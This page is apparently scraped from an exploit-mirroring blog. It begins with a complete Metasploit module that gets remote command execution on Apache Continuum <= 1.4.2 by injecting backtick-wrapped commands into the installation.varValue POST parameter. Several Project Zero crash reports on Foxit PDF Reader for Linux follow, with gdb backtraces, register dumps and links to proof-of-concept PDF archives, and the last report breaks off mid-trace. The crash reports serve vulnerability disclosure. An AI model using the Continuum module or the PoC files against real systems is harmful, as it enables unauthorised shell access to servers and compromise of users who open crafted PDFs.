##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Continuum Arbitrary Command Execution',
'Description' => %q{
This module exploits a command injection in Apache Continuum <= 1.4.2.
By injecting a command into the installation.varValue POST parameter to
/continuum/saveInstallation.action, a shell can be spawned.
},
'Author' => [
'David Shanahan', # Proof of concept
'wvu' # Metasploit module
],
'References' => [
%w{EDB 39886}
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Privileged' => false,
'Targets' => [
['Apache Continuum <= 1.4.2', {}]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8080)
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/continuum/about.action'
)
if res && res.body.include?('1.4.2')
CheckCode::Appears
elsif res && res.code == 200
CheckCode::Detected
else
CheckCode::Safe
end
end
def exploit
print_status('Injecting CmdStager payload...')
execute_cmdstager(flavor: :bourne)
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/continuum/saveInstallation.action',
'vars_post' => {
'installation.name' => Rex::Text.rand_text_alpha(8),
'installation.type' => 'jdk',
'installation.varValue' => '`' + cmd + '`'
}
)
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591923
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
(gdb) where
#0 0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
#1 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#2 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#3 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#4 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#5 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#7 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#8 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#9 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>:
mov 0x0(%r13,%rbp,8),%rcx
0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>: test %rcx,%rcx
0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>:
jne 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>
0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>: inc %rbp
0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>: movzbl 0xe(%rbx),%eax
0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>: cmp %ebp,%eax
0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>:
jg 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>
0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>:
jmp 0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145>
0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>: mov 0xc(%rsp),%esi
0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>: mov %r15,%r9
(gdb) info reg
rax 0x7c 124
rbx 0x1a66130 27681072
rcx 0xe1a704fcae02ca58 -2186773610767398312
rdx 0x7fffffffceec 140737488342764
rsi 0x2f 47
rdi 0x1a66130 27681072
rbp 0x0 0x0
rsp 0x7fffffffce90 0x7fffffffce90
r8 0xab0f92 11210642
r9 0x6a83f4ca 1787032778
r10 0xfd 253
r11 0x0 0
r12 0x7fffffffceec 140737488342764
r13 0xe1a704fcae02ca58 -2186773610767398312
r14 0xab0f92 11210642
r15 0x6a83f4ca 1787032778
rip 0xaab96c 0xaab96c <CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const+94>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
--- cut ---
Attached are three proof of concept PDF files.
There is another crash likely related to this issue:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
(gdb) where
#0 0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
#1 0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const ()
#2 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#3 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#4 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#5 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#7 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#8 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#9 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
x#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
/#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
1#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>: cmp %edi,(%rsi)
0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>: jne 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>
0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>: xor %eax,%eax
0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>: cmpb $0xfe,0x4(%rsi)
0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>: setne %al
0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>: xor $0x1,%eax
0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>: retq
0xab0fa5 <_CompareDWord>: mov (%rdi),%eax
0xab0fa7 <_CompareDWord+2>: sub (%rsi),%eax
0xab0fa9 <_CompareDWord+4>: retq
(gdb) info reg $rsi
rsi 0x71 113
--- cut ---
Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39944.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) where
#0 0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
#1 0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) ()
#2 0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) ()
#3 0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() ()
#4 0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() ()
#5 0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) ()
#6 0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#9 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, Q---Type <return> to continue, or q <return> to quit---
Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>: mov 0x4(%rdx),%rcx
0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>: mov %rcx,(%rbx)
0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>:
movslq 0x320(%rax),%rcx
0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>: mov 0x4(%rbx),%esi
0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>:
movzbl 0x19(%rdx,%rcx,1),%ecx
0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>: shl %cl,%esi
0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>:
movslq 0x320(%rax),%rcx
0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>: mov %esi,0x4(%rbx)
0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>:
movzbl 0x3a(%rdx,%rcx,1),%ecx
0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>: mov (%rbx),%edx
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) x/10wx $dx
0x101d: Cannot access memory at address 0x101d
(gdb) x/10wx $rdx
0x90ff9fc23e15101d: Cannot access memory at address 0x90ff9fc23e15101d
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39943.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744
We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The MALLOC_CHECK_=3 environment variable is used to enforce strict checks in the libc memory allocator, while DISPLAY=:1 is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
(gdb) where
#0 0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
()
#1 0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
#2 0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
#3 0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
#4 0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#5 0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#6 0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7 0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#9 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0)
at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#20 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#21 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#23 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#25 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
